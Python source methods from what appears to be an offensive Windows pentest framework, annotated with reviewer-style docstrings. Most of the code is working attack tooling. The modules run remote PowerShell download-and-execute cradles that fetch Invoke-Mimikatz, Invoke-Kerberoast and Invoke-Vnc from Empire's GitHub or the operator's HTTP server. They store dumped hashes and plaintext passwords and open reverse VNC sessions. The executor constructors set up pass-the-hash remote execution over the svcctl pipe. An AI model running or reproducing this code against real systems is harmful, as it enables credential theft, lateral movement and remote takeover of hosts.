def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Mimikatz module against one host and record parsed credentials.

    Flow: pick a script source, build a PowerShell launcher around the
    ``COMMAND`` module argument, execute it through ``code_execution``, parse
    the output with ``self.parse_mimikatz`` into the credential database, and
    mirror the raw output to a per-target file in ``args.workspace``.

    Args:
        target: host identifier used in the output file name (presumably a
            hostname/IP string; passed straight to ``str.format``).
        args: parsed CLI namespace; ``args.timeout`` is mutated in place (see
            note below) and ``fileless``, ``debug``, ``force_ps32``,
            ``no_obfs`` and ``workspace`` are read.
        smb_con: established connection object; ``host``, ``ip``, ``os`` and
            ``db`` are read.
        loggers: mapping of logger objects; only ``loggers['console']`` is used.
        config_obj: passed through to ``code_execution`` unchanged.

    Returns:
        None. All failures are reported through the console logger; nothing
        is raised to the caller.
    """
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
    try:
        # Define Script Source.
        # Either branch makes the target fetch the script itself; neither
        # source is integrity-checked here: the fileless path is plain HTTP
        # from this machine, and the hosted path is an unpinned GitHub
        # "master" URL, so whatever is served at run time is what executes.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            # NOTE: args is shared with the caller and the extended timeout is
            # never restored, so it persists after this method returns.
            setattr(args, 'timeout', timeout + 60)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            setattr(args, 'timeout', timeout + 25)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script.
        # COMMAND is interpolated verbatim inside double quotes; a value that
        # itself contains a double quote will break the PowerShell command.
        cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        try:
            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            # Display Output.
            # An empty/None result is treated as failure; raw lines are only
            # echoed in debug mode, parsed credentials are always printed.
            if not results:
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                return
            elif args.debug:
                for line in results.splitlines():
                    loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
            # Parse results and send creds to db.
            # parse_mimikatz is assumed to yield tuples of
            # (kind, domain, user, secret) -- inferred from the indexing
            # below; confirm against its definition.
            db_updates = 0
            for cred in self.parse_mimikatz(results):
                if cred[0] == "hash":
                    # update_user(user, password, domain, hash): hash entries
                    # carry an empty password.
                    smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                    db_updates += 1
                elif cred[0] == "plaintext":
                    # Plaintext entries carry an empty hash.
                    smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                    db_updates += 1
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
            # Write results to file.
            # The raw output (which contains the secrets above) is persisted
            # to the workspace in clear text; handle the workspace accordingly.
            file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(results)
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
        except Exception as e:
            # Matching on the exception *message* is fragile: it only
            # recognises the IndexError text from the cred[...] indexing above;
            # any other exception is reported verbatim.
            if str(e) == "list index out of range":
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
            else:
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
    except Exception as e:
        # Setup-phase errors are only visible at debug level.
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Vnc module against one host.

    Builds the ``Invoke-Vnc`` command line from the module arguments
    ``CONTYPE`` (``'reverse'`` or ``'bind'``), ``IPADDRESS``, ``PORT`` and
    ``PASSWORD``, wraps it in a PowerShell launcher, executes it and echoes
    the output to the console logger.

    Args:
        target: passed through to ``code_execution``.
        args: parsed CLI namespace; ``args.timeout`` is mutated in place and
            ``fileless``, ``force_ps32`` and ``no_obfs`` are read.
        smb_con: established connection object; ``host``, ``ip`` and ``os``
            are read.
        loggers: mapping of logger objects; only ``loggers['console']`` is used.
        config_obj: passed through to ``code_execution`` unchanged.

    Returns:
        None. Exceptions are logged at debug level, except that an invalid
        ``CONTYPE`` calls ``exit(1)`` and terminates the whole process
        (``SystemExit`` is not caught by ``except Exception``).
    """
    cmd = ''
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
    try:
        # Define Script Source.
        # No integrity check on either source: plain HTTP from this machine
        # when fileless, otherwise an unpinned GitHub "master" URL.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
            # NOTE: the extended timeout is written back to the shared args
            # object and never restored.
            setattr(args, 'timeout', timeout + 30)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
            setattr(args, 'timeout', timeout + 15)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script
        if self.args['CONTYPE']['Value'] == 'reverse':
            # Empty IPADDRESS defaults to this machine's address; the default
            # is written back into self.args and so persists across calls.
            if not self.args['IPADDRESS']['Value']:
                self.args['IPADDRESS']['Value'] = get_local_ip()
            # Argument values are interpolated unquoted into the command line.
            cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
        elif self.args['CONTYPE']['Value'] == 'bind':
            cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
        else:
            # Reported via .success() although it is an error condition, and
            # exit(1) ends the entire program rather than just this module.
            loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
            exit(1)
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        # Execute
        cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
        x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
        # Display Output.
        # code_execution is assumed to return a str that starts with
        # 'Code execution failed' on failure; a None return would raise here
        # and be swallowed by the outer handler.
        if not x.startswith('Code execution failed'):
            for line in x.splitlines():
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
        else:
            # NOTE: this branch is the *failure* case, but the message reads
            # as if the command succeeded silently.
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Kerberoast module against one host and save its output.

    The script is executed with no extra command text (an empty string is
    passed to the cradle builder), every output line is printed at success
    level, and the raw output is written to ``kerberoast_<target>_<stamp>.txt``
    inside ``args.workspace``.

    Args:
        target: host identifier used in the output file name.
        args: parsed CLI namespace; ``args.timeout`` is mutated in place and
            ``fileless``, ``force_ps32``, ``no_obfs`` and ``workspace`` are read.
        smb_con: established connection object; ``host``, ``ip`` and ``os``
            are read.
        loggers: mapping of logger objects; only ``loggers['console']`` is used.
        config_obj: passed through to ``code_execution`` unchanged.

    Returns:
        None. Any exception is logged at debug level and swallowed.
    """
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast'])
    try:
        # Define Script Source.
        # Neither source is integrity-checked: plain HTTP from this machine
        # when fileless, otherwise an unpinned GitHub "master" URL.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(srv_addr)
            # NOTE: written back to the shared args object and never restored.
            setattr(args, 'timeout', timeout + 30)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
            setattr(args, 'timeout', timeout + 15)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script -- no command argument, the script runs as-is.
        launcher = powershell.gen_ps_iex_cradle(script_location, '')
        # Execute
        cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
        x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
        # Display Output.
        # Unlike the other modules there is no check for a failed/empty
        # result here; a 'Code execution failed' string would be printed and
        # saved like any other output, and a None return would raise (and be
        # swallowed below).
        for line in x.splitlines():
            loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])
        # Write results to file (clear text, in the workspace directory).
        file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
        tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
        tmp_logger.info(x)
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Mimikatz module (earlier variant) and record parsed credentials.

    Differs from the other Invoke-Mimikatz ``run`` in this file: it uses the
    ``obfs`` flag rather than ``no_obfs``, passes ``cmd`` by keyword, prints
    every raw output line at success level, and does not write output to a
    file or report failure when nothing is returned.

    Args:
        target: passed through to ``code_execution``.
        args: parsed CLI namespace; ``args.timeout`` is mutated in place and
            ``fileless``, ``force_ps32`` and ``obfs`` are read.
        smb_con: established connection object; ``host``, ``ip``, ``os`` and
            ``db`` are read.
        loggers: mapping of logger objects; only ``loggers['console']`` is used.
        config_obj: passed through to ``code_execution`` unchanged.

    Returns:
        None. Errors are reported only at debug level.
    """
    logger = loggers['console']
    try:
        # Get script.
        # No integrity check on either source: plain HTTP from this machine
        # when fileless, otherwise an unpinned GitHub "master" URL.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
        logger.debug('Fetching script from {}'.format(script_location))
        # Setup
        timeout = args.timeout
        # Modify timeout to allow execution time. NOTE: args is shared with the
        # caller and the original value is never restored.
        setattr(args, 'timeout', timeout+10)
        # COMMAND is interpolated verbatim inside double quotes; a value
        # containing a double quote will break the PowerShell command.
        cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        try:
            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
            # Display Output -- every raw line, including any secrets, is
            # printed at success level; a None result raises here and is
            # swallowed by the inner handler.
            for line in x.splitlines():
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])
            # Parse results and send creds to db.
            # parse_mimikatz is assumed to yield (kind, domain, user, secret)
            # tuples -- inferred from the indexing below; confirm against its
            # definition.
            db_updates = 0
            for cred in self.parse_mimikatz(x):
                if cred[0] == "hash":
                    # update_user(user, password, domain, hash)
                    smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                    db_updates += 1
                elif cred[0] == "plaintext":
                    smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                    db_updates += 1
            loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
        except Exception as e:
            # Execution/parsing failures are only visible with debug logging.
            loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))
def __init__(self, logger, host, args, smb_con, share_name: str = '') -> None:
    """Initialise execution state and output location for this executor.

    Stores credentials and options from ``args``, then decides where command
    output is collected: on a share served from this machine when
    ``share_name`` is given ("fileless"), otherwise on the share/path named
    by ``args.exec_ip`` / ``args.exec_share`` / ``args.exec_path``.

    Args:
        logger: logger object kept on ``self.logger``.
        host: target host identifier kept on ``self.host``.
        args: parsed CLI namespace; reads ``debug``, ``domain``, ``user``,
            ``passwd``, ``hash``, ``no_output``, ``timeout`` and, when no
            share name is given, ``exec_ip``, ``exec_share``, ``exec_path``.
        smb_con: established connection object kept on ``self.smbcon``.
        share_name: name of a locally served share; empty selects the
            remote/filed output mode.
    """
    # Random name for the remote output file.
    self.outfile = gen_random_string()
    self.debug = args.debug
    self.logger = logger
    self.host = host
    self.domain = args.domain
    self.username = args.user
    self.password = args.passwd
    self.hash = args.hash
    self.lmhash = ''
    self.nthash = ''
    # Starting working directory and command wrapper for remote execution.
    self.pwd = str('C:\\')
    self.shell = 'cmd.exe /Q /c '
    self.noOutput = args.no_output
    self.outputBuffer = ''
    self.timeout = args.timeout
    self.smbcon = smb_con
    self.fileless_output = False
    if share_name:
        # Fileless output: output is written to a share on this machine.
        self.fileless_output = True
        self.ip = get_local_ip()
        self.share = share_name
        self.path = "\\"
    else:
        # Filed or Remote output: location comes from the CLI arguments.
        self.ip = args.exec_ip
        self.share = args.exec_share
        self.path = args.exec_path
    if self.hash:
        # Expected form is "LM:NT"; a value with no colon (or more than one)
        # is taken to be the NT hash alone. The bare except also swallows
        # KeyboardInterrupt/SystemExit -- ValueError would be the precise one.
        try:
            self.lmhash, self.nthash = self.hash.split(':')
        except:
            self.nthash = self.hash
def __init__(self, logger, host, args, smb_con, port: int = 445, share_name: str = '') -> None:
    """Initialise the executor and open a Service Control Manager handle on the target.

    Besides storing credentials and the output location (same scheme as the
    other executor in this file), the constructor performs network I/O: it
    builds an ``ncacn_np`` transport to the ``svcctl`` named pipe, connects,
    binds to the SCMR interface and keeps the returned SCM handle on
    ``self.__scHandle``. Exceptions from that connection sequence propagate
    to the caller.

    Args:
        logger: logger object kept on ``self.logger``.
        host: target host identifier used for the transport string binding.
        args: parsed CLI namespace; reads ``user``, ``passwd``, ``domain``,
            ``hash``, ``timeout``, ``debug``, ``no_output`` and, when no share
            name is given, ``exec_ip``, ``exec_share``, ``exec_path``.
        smb_con: established connection object kept on ``self.smbcon``.
        port: destination port set on the RPC transport.
        share_name: name of a locally served share; empty selects the
            remote/filed output mode.
    """
    self.logger = logger
    # Random names for the remote output file, batch file and service;
    # the service name is what shows up on the target if it is logged.
    self.outfile = gen_random_string()
    self.batchFile = gen_random_string() + '.bat'
    self.__serviceName = gen_random_string()
    self.__rpctransport = None
    self.__scmr = None
    self.__conn = None
    self.__output = None
    self.__shell = '%COMSPEC% /Q /c '
    # self.__mode = mode
    # self.__aesKey = aesKey
    # self.__doKerberos = doKerberos
    # Auth
    self.smbcon = smb_con
    self.host = host
    self.port = port
    self.username = args.user
    self.password = args.passwd
    self.domain = args.domain
    self.hash = args.hash
    self.lmhash = ''
    self.nthash = ''
    self.timeout = args.timeout
    self.debug = args.debug
    self.noOutput = args.no_output
    self.fileless_output = False
    if share_name:
        # Fileless output: output is written to a share on this machine.
        self.fileless_output = True
        self.ip = get_local_ip()
        self.share = share_name
        self.path = "\\"
    else:
        # Filed or Remote output: location comes from the CLI arguments.
        self.ip = args.exec_ip
        self.share = args.exec_share
        self.path = args.exec_path
    if self.hash:
        # Expected form is "LM:NT"; anything that does not split into exactly
        # two parts is taken to be the NT hash alone. The bare except also
        # swallows KeyboardInterrupt/SystemExit -- ValueError would be precise.
        try:
            self.lmhash, self.nthash = self.hash.split(':')
        except:
            self.nthash = self.hash
    # NOTE: non-raw string, so "\p" and "\s" are invalid escape sequences
    # that Python currently keeps literally; a raw string would be safer.
    stringbinding = 'ncacn_np:{}[\pipe\svcctl]'.format(self.host)
    self.logger.debug('StringBinding {}'.format(stringbinding))
    self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
    self.__rpctransport.set_dport(self.port)
    if hasattr(self.__rpctransport, 'setRemoteHost'):
        self.__rpctransport.setRemoteHost(self.host)
    if hasattr(self.__rpctransport, 'set_credentials'):
        # This method exists only for selected protocol sequences.
        self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
    #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
    # Network I/O starts here; failures propagate out of __init__.
    self.__scmr = self.__rpctransport.get_dce_rpc()
    self.__scmr.connect()
    s = self.__rpctransport.get_smb_connection()
    # We don't wanna deal with timeouts from now on.
    s.setTimeout(self.timeout)
    self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
    # Handle is held for the object's lifetime; nothing in this block closes it.
    resp = scmr.hROpenSCManagerW(self.__scmr)
    self.__scHandle = resp['lpScHandle']